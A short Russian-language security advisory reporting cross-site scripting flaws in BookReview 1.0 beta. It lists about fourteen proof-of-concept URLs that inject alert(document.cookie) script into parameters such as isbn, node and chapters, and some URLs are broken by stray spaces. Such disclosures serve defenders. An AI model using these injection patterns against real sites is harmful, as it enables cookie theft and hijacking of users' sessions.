Программа: BookReview 1.0 beta

Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
получить доступ к потенциально важным
данным других пользователей. Уязвимость
существует в различных сценариях из-за
недостаточной обработки входных данных.
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольный HTML сценарий в браузере жертвы
в контексте безопасности уязвимого сайта.

Примеры:

http://[target]/add_review.htm?isbn=0801052319&node= %3Cscript%3Ealert(document.cookie)%3C/script%3E
&review=true

http://[target]/add_review.htm?isbn=0801052319%22%3 E%3Cscript%3Ealert(document.cookie)%3C/script%3
E&node=Political_Science&review=true

http://[target]/add_review.htm?isbn=0553278223&node="><script>ale
rt(document.cookie)</script>&review=true

http://[target]/add_review.htm?node=index&isbn=\\"> < script>alert(document.cookie)</script>

http://[target]/index.php?page=add_contents&isbn=
083081423X%22%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E&chapters=25

http://[target]/index.php?page=add_contents&isbn= 083081423X&chapters=25%22%3E%3Cscript
%3Ealert(document.cookie)%3C/script%3E

http://[target]/add_contents.htm?isbn=083081423X%22 %3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[tar get]/suggest_category.htm?node=Agriculture
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/contact.htm?user=admin%22%3E%3C script%3Ealert(document.
cookie)%3C/script%3E

http://[target]/add_booklist.htm?node=Agriculture_and_
Aquaculture%22%3E%3Cscript%3 Ealert(document.cookie)%3C/script%3E

http://[target]/add_url. htm?node=%3Cscript%3Ealert( document.cookie)%3C/script%3E

http://[target]/search.htm?page=search&submit%5Bstring%5D=
%5C%22%3E%3Cscript%3Ealert%28document. cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btypeu

http://[target]/add_classification.htm?isbn=0830815961
%22%3E%3Cscript%3Ealert(document.cookie)%3 C/script%3E&node=Gospels

http:// [target]/suggest_review.htm?node=Business_
and_Economics"><SCRIPT>alert()</SCRIPT>

Оставить мнение